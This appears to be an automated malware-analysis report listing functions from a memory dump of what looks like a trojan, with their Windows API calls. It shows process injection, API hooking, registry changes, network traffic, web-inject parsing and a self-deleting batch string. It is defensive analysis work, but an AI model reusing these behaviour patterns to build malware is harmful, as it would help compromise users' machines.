Function 00B01215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 00B0122B
InitializeCriticalSection.KERNEL32(00B22910), ref: 00B0123B

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

memset.MSVCRT ref: 00B0126A
InitializeCriticalSection.KERNEL32(00B228F0), ref: 00B01274

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFBFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 00AFC0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 00AFC10C

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

Part of subcall function 00AFCC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 00AFCDAF

Part of subcall function 00AF5A9B: GetLastError.KERNEL32(?,00000000,00AFC683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00AF5A9D
Part of subcall function 00AF5A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 00AF5ABA
Part of subcall function 00AF5A9B: SetLastError.KERNEL32(?,?,00000000,00AFC683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00AF5ACA

Part of subcall function 00AF5A4F: GetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A51
Part of subcall function 00AF5A4F: TlsGetValue.KERNEL32(?,?,00AEB9B4), ref: 00AF5A6E
Part of subcall function 00AF5A4F: TlsSetValue.KERNEL32(00000001), ref: 00AF5A80
Part of subcall function 00AF5A4F: SetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A90

Part of subcall function 00AF5AD5: GetLastError.KERNEL32(?,00AEBA1E), ref: 00AF5AD6
Part of subcall function 00AF5AD5: TlsSetValue.KERNEL32(00000000), ref: 00AF5AE6
Part of subcall function 00AF5AD5: SetLastError.KERNEL32(?,?,00AEBA1E), ref: 00AF5AED

Part of subcall function 00AF7DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00AEB9D5,00000003,?,00000000,00000000), ref: 00AF7E07
Part of subcall function 00AF7DF0: InterlockedIncrement.KERNEL32(?,?), ref: 00AF7E5B
Part of subcall function 00AF7DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00AEB9D5,00000003,?,00000000,00000000), ref: 00AF7E62

Part of subcall function 00AF7E75: EnterCriticalSection.KERNEL32(00DB26B4,00DB26A0,00000001,?,00DB26A0,00AFC026,00000001,?), ref: 00AF7E8F
Part of subcall function 00AF7E75: LeaveCriticalSection.KERNEL32(00DB26B4,?,?,?), ref: 00AF7EBE

Strings

d, xrefs: 00AFBFE8
n, xrefs: 00AFBFF5

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 00AF908C

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

InternetReadFile.WININET(00AF388E,?,00001000,?), ref: 00AF90DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00AF90BB

Part of subcall function 00AF6AAB: memcpy.MSVCRT ref: 00AF6AD1

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,00AF388E,?,00000CCA,?,?,00000001), ref: 00AF9132

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B15A2D, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

GetTempFileNameW.KERNEL32(00000426,?,?,?), ref: 00B15A84
PathFindFileNameW.SHLWAPI(?), ref: 00B15A93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00B15ACC
memcpy.MSVCRT ref: 00B15AF1

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF72C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00B13993: memcpy.MSVCRT ref: 00B13AA4

Part of subcall function 00AEE524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00AEE534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 00AF732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AF7347
FlushFileBuffers.KERNEL32(?), ref: 00AF7361
SetEndOfFile.KERNEL32 ref: 00AF737B

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AEE4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00AEE502

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0FC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 00B0FC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 00B0FC99
memcmp.MSVCRT ref: 00B0FCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 00B0FD3F

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00B12F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00B12F9D
WSAEventSelect.WS2_32 ref: 00B12FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 00B12FFE

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEE141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 00AEE16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 00AEE1A6

Part of subcall function 00AEDE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00AEE138,?,?,?,?,?,00000009,00000000), ref: 00AEDE7E
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDEEF
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDF13
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDF2A
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDF4A
Part of subcall function 00AEDE64: LeaveCriticalSection.KERNEL32 ref: 00AEDF65

LeaveCriticalSection.KERNEL32(?,?,00AE7854,?,000000FF,00000000), ref: 00AEE1CC

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

GlobalUnlock.KERNEL32 ref: 00AEE1D3

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B106B6, Relevance: 6.1, APIs: 4, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 00B106D4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00B10709
RegCloseKey.ADVAPI32(?), ref: 00B10718
RegCloseKey.ADVAPI32(?), ref: 00B10733

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0FBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,00B0FEB0,?,?,?,?,00000002), ref: 00B0FBF4
GetTickCount.KERNEL32 ref: 00B0FC27
memcpy.MSVCRT ref: 00B0FC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00B0FEB0,?,?,?,?,00000002), ref: 00B0FC6C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEC86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

DeleteCriticalSection.KERNEL32(?,?,?,?,00AEC856), ref: 00AEC8C2

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

CloseHandle.KERNEL32 ref: 00AEC8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,00AEC856), ref: 00AEC8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00AEC856), ref: 00AEC8F0

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEAA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetTickCount.KERNEL32 ref: 00AEAA11
GetLastInputInfo.USER32(?), ref: 00AEAA24
GetLocalTime.KERNEL32(?), ref: 00AEAA48

Part of subcall function 00B0D979: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B0D983

GetTimeZoneInformation.KERNEL32(?), ref: 00AEAA60

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF2F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 00AF2F6C
TranslateMessage.USER32(?), ref: 00AF2F90
DispatchMessageW.USER32(?), ref: 00AF2F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF2FAB

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFE1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 00AF568C: TlsSetValue.KERNEL32(00000001,00AFE1BD), ref: 00AF5699

Part of subcall function 00B0BEE3: CreateMutexW.KERNEL32(00B22974,00000000,?), ref: 00B0BF05

Part of subcall function 00B04B8D: WaitForSingleObject.KERNEL32(00000000,00AFE1D7), ref: 00B04B95

GetCurrentThread.KERNEL32 ref: 00AFE1DF
SetThreadPriority.KERNEL32 ref: 00AFE1E6
WaitForSingleObject.KERNEL32(00001388), ref: 00AFE1F8

Part of subcall function 00B14181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B141A1
Part of subcall function 00B14181: Process32FirstW.KERNEL32(?,?), ref: 00B141C6
Part of subcall function 00B14181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00B1421D
Part of subcall function 00B14181: CloseHandle.KERNEL32 ref: 00B1423B
Part of subcall function 00B14181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00B14257
Part of subcall function 00B14181: memcmp.MSVCRT ref: 00B1426F
Part of subcall function 00B14181: CloseHandle.KERNEL32(?), ref: 00B142E7
Part of subcall function 00B14181: Process32NextW.KERNEL32(?,?), ref: 00B142F3
Part of subcall function 00B14181: CloseHandle.KERNEL32 ref: 00B14306

WaitForSingleObject.KERNEL32(00001388), ref: 00AFE211

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEDE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 00AEDE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 00AEDE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 00AEDE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 00AEDE52

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B113F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 00B11418
getsockname.WS2_32(?,?,?), ref: 00B11430
send.WS2_32(00000000,?,00000008,00000000), ref: 00B11461

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 00AF6C23
connect.WS2_32 ref: 00AF6C40
closesocket.WS2_32 ref: 00AF6C4B

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B04CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 00B04CC6

Part of subcall function 00AF0243: CryptDestroyKey.ADVAPI32 ref: 00AF025A
Part of subcall function 00AF0243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 00AF0278

memset.MSVCRT ref: 00B04D69

Part of subcall function 00AF028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 00AF02B0

Part of subcall function 00AE9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00AE9ACA
Part of subcall function 00AE9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00AE9AEF

Part of subcall function 00AF02CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,00B04D47), ref: 00AF031F

Part of subcall function 00AF0223: CryptDestroyKey.ADVAPI32 ref: 00AF0235

Strings

\26}, xrefs: 00B04CBE

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0BE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

Part of subcall function 00B0BAD3: memcpy.MSVCRT ref: 00B0BAEE
Part of subcall function 00B0BAD3: StringFromGUID2.OLE32(?), ref: 00B0BB92

CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00B0BEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00B0BEAC
CloseHandle.KERNEL32 ref: 00B0BEBA

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,00B12C15,?,00000000,?,00B12CD1,?,?,?,?,00000000), ref: 00B1292D
WSAEventSelect.WS2_32(?,?,00B12CD1), ref: 00B12943
WSACloseEvent.WS2_32(?), ref: 00B12957

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0C3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(00AE7C5C), ref: 00B0C3FC
lstrlenW.KERNEL32(?), ref: 00B0C402

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

memcpy.MSVCRT ref: 00B0C426

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B065F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 00B065A9: StrCmpNIA.SHLWAPI ref: 00B065C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00B0675C

Strings

script, xrefs: 00B06669 00B06693
nbsp;, xrefs: 00B06754

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF7058, Relevance: 5.7, APIs: 3, Instructions: 82

APIs

Part of subcall function 00AFDCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00AFDD10
Part of subcall function 00AFDCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00AFDD24
Part of subcall function 00AFDCF8: CloseHandle.KERNEL32 ref: 00AFDD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 00AF708F

Part of subcall function 00AFDD44: UnmapViewOfFile.KERNEL32 ref: 00AFDD50
Part of subcall function 00AFDD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,00000000), ref: 00AFDD67

Part of subcall function 00AEE524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00AEE534

SetEndOfFile.KERNEL32 ref: 00AF7105
FlushFileBuffers.KERNEL32(?), ref: 00AF7110

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

Part of subcall function 00AEE56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AEE594

Part of subcall function 00AF6F3F: GetFileAttributesW.KERNEL32(?), ref: 00AF6F50
Part of subcall function 00AF6F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 00AF6F85
Part of subcall function 00AF6F3F: MoveFileExW.KERNEL32(?,?,00000001), ref: 00AF6FCC
Part of subcall function 00AF6F3F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00AF6FE5
Part of subcall function 00AF6F3F: Sleep.KERNEL32(00001388), ref: 00AF7028
Part of subcall function 00AF6F3F: FlushFileBuffers.KERNEL32 ref: 00AF7036

Part of subcall function 00AFDCB8: UnmapViewOfFile.KERNEL32 ref: 00AFDCC4
Part of subcall function 00AFDCB8: CloseHandle.KERNEL32 ref: 00AFDCD7
Part of subcall function 00AFDCB8: CloseHandle.KERNEL32 ref: 00AFDCED

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 00AF6BC5
recv.WS2_32(?,?,?,00000000), ref: 00AF6BD5

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 00AF0730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00AF0767

Part of subcall function 00AF0643: memset.MSVCRT ref: 00AF0654

Part of subcall function 00AF03FD: GetCurrentProcess.KERNEL32 ref: 00AF0400
Part of subcall function 00AF03FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00AF0421
Part of subcall function 00AF03FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 00AF042A

ResumeThread.KERNEL32(?), ref: 00AF07A8

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0589C, Relevance: 5.6, APIs: 3, Instructions: 50

APIs

EnterCriticalSection.KERNEL32(00B23510,?,00000001,?,?,00B05AB4,?,?,?,00000001), ref: 00B058B8
LeaveCriticalSection.KERNEL32(00B23510,?,?,00B05AB4,?,?,?,00000001), ref: 00B058DF

Part of subcall function 00B0575A: memset.MSVCRT ref: 00B05774
Part of subcall function 00B0575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B057BA

Part of subcall function 00AE9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00AE9ACA
Part of subcall function 00AE9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00AE9AEF

Part of subcall function 00AE9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00AE9B41

_ultow.MSVCRT ref: 00B05926

Part of subcall function 00AE9A2A: CryptDestroyHash.ADVAPI32 ref: 00AE9A42
Part of subcall function 00AE9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AE9A53

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0D7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 00B0D7BF

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00B0D7FF
InternetCloseHandle.WININET(?), ref: 00B0D80A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B045AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B045D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B045E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00B04604

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B13629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00B1363C
GetLastError.KERNEL32(?,00AF5032,?,00000008,?,?,?,?,?,?,00B049E1,?,?,00000001), ref: 00B13646

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00B1366E

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00AF5020

Part of subcall function 00B13629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00B1363C
Part of subcall function 00B13629: GetLastError.KERNEL32(?,00AF5032,?,00000008,?,?,?,?,?,?,00B049E1,?,?,00000001), ref: 00B13646
Part of subcall function 00B13629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00B1366E

GetTokenInformation.ADVAPI32(?,0000000C,00B22968,00000004,?), ref: 00AF5048

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

CloseHandle.KERNEL32(?), ref: 00AF505E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 00AF6F09
bind.WS2_32 ref: 00AF6F25
closesocket.WS2_32 ref: 00AF6F30

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEF825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 00B12976
closesocket.WS2_32(?), ref: 00B1297F
WSACloseEvent.WS2_32(?), ref: 00B12992

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFE22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00AFE22E
PathRemoveExtensionW.SHLWAPI(?), ref: 00AFE242
CharUpperW.USER32(?,?,?,00AFE32B), ref: 00AFE24C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

Part of subcall function 00AF692C: EnterCriticalSection.KERNEL32(00B23510,00000024,00AF699F,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF693C
Part of subcall function 00AF692C: LeaveCriticalSection.KERNEL32(00B23510,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF6966

HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B07011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(00B22FD8), ref: 00B0702B
GetNativeSystemInfo.KERNEL32(?), ref: 00B07167
memset.MSVCRT ref: 00B0719C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFE4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AFE4E9

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Part of subcall function 00AFE22A: PathFindFileNameW.SHLWAPI(?), ref: 00AFE22E
Part of subcall function 00AFE22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00AFE242
Part of subcall function 00AFE22A: CharUpperW.USER32(?,?,?,00AFE32B), ref: 00AFE24C

Part of subcall function 00B0100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00B0103A

Sleep.KERNEL32(000001F4), ref: 00AFE57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00AFE50A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AE9A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 00AE99B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 00AE99CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00AE9ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00AE9AEF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B04159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00B04188

Part of subcall function 00AF6A7D: memcpy.MSVCRT ref: 00AF6A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00B041C7

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B041EE

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B05594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 00B1537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 00B153E5
Part of subcall function 00B1537E: memset.MSVCRT ref: 00B153FB

GetSystemTime.KERNEL32(?), ref: 00B055BA

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
